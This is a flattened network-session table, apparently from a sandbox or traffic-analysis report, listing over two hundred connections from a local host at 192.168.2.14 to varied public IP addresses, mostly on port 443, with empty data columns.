                                      25635192.168.2.1452712196.113.40.191443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25636192.168.2.143667432.189.242.20443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25637192.168.2.145496418.235.203.217443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25638192.168.2.1453502218.85.8.240443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25639192.168.2.1446492217.228.168.40443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25640192.168.2.1442962170.111.217.28443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25641192.168.2.143607860.143.244.27443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25642192.168.2.1450636166.222.4.187443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25643192.168.2.1456170223.9.61.45443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25644192.168.2.1452264113.171.253.79443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25645192.168.2.1440032187.131.230.154443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25646192.168.2.14367325.30.1.8443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25647192.168.2.144820263.201.196.152443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25648192.168.2.1460178163.129.76.53443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25649192.168.2.1442344163.33.33.225443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25650192.168.2.145492272.141.43.117443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25651192.168.2.144198083.38.218.245443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25652192.168.2.143509251.52.184.88443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25653192.168.2.1438534113.226.252.103443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25654192.168.2.144603250.205.141.202443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25655192.168.2.1449554131.141.37.2443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25656192.168.2.1456526195.140.12.33443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25657192.168.2.143326040.244.250.135443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25658192.168.2.1449466133.166.188.207443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25659192.168.2.1456304122.19.200.33443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25660192.168.2.144224069.63.164.214443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25661192.168.2.1449904199.243.7.129443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25662192.168.2.1451282109.126.143.60443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25663192.168.2.143440070.209.24.179443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25664192.168.2.1437490174.44.255.172443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25665192.168.2.144010695.205.118.204443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25666192.168.2.145614052.99.116.62443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25667192.168.2.144273467.242.79.250443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25668192.168.2.1456980106.123.90.49443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25669192.168.2.1434488166.207.207.121443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25670192.168.2.1437560157.138.185.154443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25671192.168.2.1441210177.236.39.168443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25672192.168.2.1447706179.51.132.179443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25673192.168.2.1455262129.124.21.4443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25674192.168.2.145563851.255.78.228443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25675192.168.2.1445472159.54.66.201443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25676192.168.2.144956281.207.200.126443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25677192.168.2.145148631.76.214.166443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25678192.168.2.144108617.131.23.212443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25679192.168.2.144072074.13.106.38443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25680192.168.2.1443016144.96.24.180443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25681192.168.2.143485685.111.69.16443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25682192.168.2.1434374203.1.11.73443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25683192.168.2.1446844182.35.62.6443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25684192.168.2.1460686124.153.102.93443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25685192.168.2.1449388218.82.178.52443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25686192.168.2.1434954125.54.98.70443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25687192.168.2.1442474211.11.203.135443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25688192.168.2.144298227.208.35.43443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25689192.168.2.144082438.17.124.64443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25690192.168.2.1448790177.129.197.223443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25691192.168.2.1460334104.104.23.241443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25692192.168.2.1432922135.167.52.71443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25693192.168.2.1453038173.96.230.98443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25694192.168.2.1460376192.171.160.147443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25695192.168.2.14492521.171.105.23443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25696192.168.2.1456098211.225.227.86443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25697192.168.2.1443102135.81.29.144443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25698192.168.2.1444398163.196.125.79443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25699192.168.2.143561437.200.34.233443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25700192.168.2.1452624101.32.91.229443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25701192.168.2.1434594121.250.98.25443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25702192.168.2.145856820.162.48.35443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25703192.168.2.143753462.162.224.223443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25704192.168.2.144109475.183.96.164443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25705192.168.2.1434270105.78.58.61443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25706192.168.2.144024886.151.138.67443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25707192.168.2.146017264.236.179.212443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25708192.168.2.144106657.240.193.158443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25709192.168.2.146095487.73.70.181443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25710192.168.2.145205235.81.31.97443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25711192.168.2.143784024.83.18.208443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25712192.168.2.1440166201.254.77.96443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25713192.168.2.1437658118.117.175.214443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25714192.168.2.144378095.125.236.150443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25715192.168.2.143623292.126.11.97443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25716192.168.2.1433150129.202.63.198443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25717192.168.2.1457530204.199.122.79443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25718192.168.2.143922835.199.203.212443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25719192.168.2.146013842.223.157.12443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25720192.168.2.1440788150.132.34.237443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25721192.168.2.146090864.118.202.8443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25722192.168.2.1452310160.61.248.166443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25723192.168.2.1453930114.153.140.89443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25724192.168.2.1451444221.87.47.185443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25725192.168.2.146054019.235.141.227443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25726192.168.2.145629846.129.169.134443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25727192.168.2.143433223.96.145.40443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25728192.168.2.145596698.244.182.225443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25729192.168.2.1449782211.31.222.208443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25730192.168.2.1446442132.36.209.132443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25731192.168.2.145207219.119.6.161443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25732192.168.2.1434116111.136.204.157443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25733192.168.2.145582631.136.252.1578080
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25734192.168.2.1446386112.164.130.132443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25735192.168.2.14483845.89.222.116443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25736192.168.2.145645082.55.233.190443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25737192.168.2.1443982221.23.164.244443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25738192.168.2.1441288218.198.132.225443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25739192.168.2.143279451.252.88.228443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25740192.168.2.1448484196.49.233.151443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25741192.168.2.1439340138.149.157.52443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25742192.168.2.1448014168.27.171.214443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25743192.168.2.1454540178.126.128.127443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25744192.168.2.144992095.243.39.138443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25745192.168.2.145052689.4.191.51443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25746192.168.2.1436108204.134.97.12443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25747192.168.2.1442556131.177.242.178443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25748192.168.2.1436566185.188.143.203443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25749192.168.2.1444026165.93.164.180443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25750192.168.2.143776051.118.102.93443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25751192.168.2.145015417.70.254.75443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25752192.168.2.1456554135.5.80.229443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25753192.168.2.1446154171.124.219.138443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25754192.168.2.1447462107.176.128.45443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25755192.168.2.1446918146.174.195.44443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25756192.168.2.1450304192.226.48.131443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25757192.168.2.143448250.226.223.170443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25758192.168.2.143704693.206.116.221443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25759192.168.2.1439772201.72.148.177443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25760192.168.2.144172232.40.212.147443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25761192.168.2.1449082222.78.84.81443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25762192.168.2.144346427.128.111.226443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25763192.168.2.145074089.138.103.255443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25764192.168.2.144513275.40.247.240443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25765192.168.2.1458028106.255.120.209443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25766192.168.2.14446701.29.30.214443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25767192.168.2.143323697.180.93.71443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25768192.168.2.1460730122.198.75.63443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25769192.168.2.1458578108.255.125.116443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25770192.168.2.145224094.78.30.30443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25771192.168.2.1439768174.89.138.22443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25772192.168.2.1433942164.99.26.139443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25773192.168.2.1433784188.85.184.51443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25774192.168.2.143350227.108.235.125443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25775192.168.2.1437966162.174.12.41443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25776192.168.2.1441906177.43.243.139443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25777192.168.2.1438386192.223.70.253443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25778192.168.2.145047825.102.86.178443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25779192.168.2.1448038187.34.159.64443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25780192.168.2.1460868109.46.30.242443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25781192.168.2.145614093.149.142.162443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25782192.168.2.14461802.62.160.205443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25783192.168.2.143522073.153.120.239443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25784192.168.2.144458858.113.44.242443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25785192.168.2.1452158155.145.210.184443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25786192.168.2.1458238204.130.164.103443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25787192.168.2.1449926130.158.83.72443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25788192.168.2.14518009.182.207.38443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25789192.168.2.1460860104.162.183.99443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25790192.168.2.1450834126.72.17.37443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25791192.168.2.144474098.73.208.104443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25792192.168.2.144002079.0.250.23443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25793192.168.2.1447688104.76.14.27443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25794192.168.2.1442820142.130.93.91443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25795192.168.2.145876288.110.168.63443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25796192.168.2.146003036.150.49.4443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25797192.168.2.1453608160.42.34.78443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25798192.168.2.1457590123.32.246.12443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25799192.168.2.1442100149.83.138.67443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25800192.168.2.144392465.43.123.138443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25801192.168.2.1454136105.92.190.151443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25802192.168.2.145600071.226.172.33443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25803192.168.2.1441696139.204.121.110443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25804192.168.2.144554893.179.247.193443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25805192.168.2.1460430187.29.71.128443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25806192.168.2.1451218106.205.153.5443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25807192.168.2.1447378118.139.0.73443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25808192.168.2.14535242.213.45.188443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25809192.168.2.143655627.208.158.151443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25810192.168.2.1453660139.50.175.151443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25811192.168.2.1440230199.180.54.239443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25812192.168.2.143817837.52.23.10443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25813192.168.2.1443414130.94.119.194443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25814192.168.2.145451668.42.73.111443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25815192.168.2.1455570191.123.243.101443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25816192.168.2.143960659.213.229.251443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25817192.168.2.1456722223.59.111.147443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25818192.168.2.144227824.223.156.29443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25819192.168.2.1442486106.168.222.24443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25820192.168.2.1449200187.254.171.120443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25821192.168.2.1440632199.38.163.95443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25822192.168.2.143912650.133.103.95443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25823192.168.2.1446080195.93.231.49443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25824192.168.2.143533058.14.206.221443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25825192.168.2.143661292.147.238.7443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25826192.168.2.1453466185.89.173.14443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25827192.168.2.1437970121.171.222.23443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25828192.168.2.143796687.243.94.41443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25829192.168.2.1437112102.23.79.98443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25830192.168.2.1444654182.36.204.33443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25831192.168.2.143836491.229.198.252443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25832192.168.2.144497290.209.81.246443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25833192.168.2.1459444202.184.175.154443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25834192.168.2.1444858223.195.82.145443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25835192.168.2.1458626187.95.90.100443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25836192.168.2.1459394102.81.34.39443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25837192.168.2.1458370101.177.57.238443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25838192.168.2.145548613.229.2.248443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25839192.168.2.1451364152.212.7.209443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25840192.168.2.1434908221.179.197.2443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25841192.168.2.1456116141.194.83.168443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25842192.168.2.1456754163.113.133.106443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25843192.168.2.1457086130.22.184.224443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25844192.168.2.1448576172.242.2.111443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25845192.168.2.1455084126.40.117.214443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25846192.168.2.145750080.51.22.220443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25847192.168.2.1440754131.214.216.156443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25848192.168.2.1436574139.160.186.156443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25849192.168.2.143969486.32.85.172443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25850192.168.2.144994680.171.222.200443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25851192.168.2.145506640.208.227.39443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25852192.168.2.145005289.106.85.212443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25853192.168.2.1447018218.114.136.71443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25854192.168.2.143550444.139.5.81443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25855192.168.2.1458320193.157.93.58443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25856192.168.2.1456284102.154.4.127443
                                      TimestampBytes transferredDirectionData


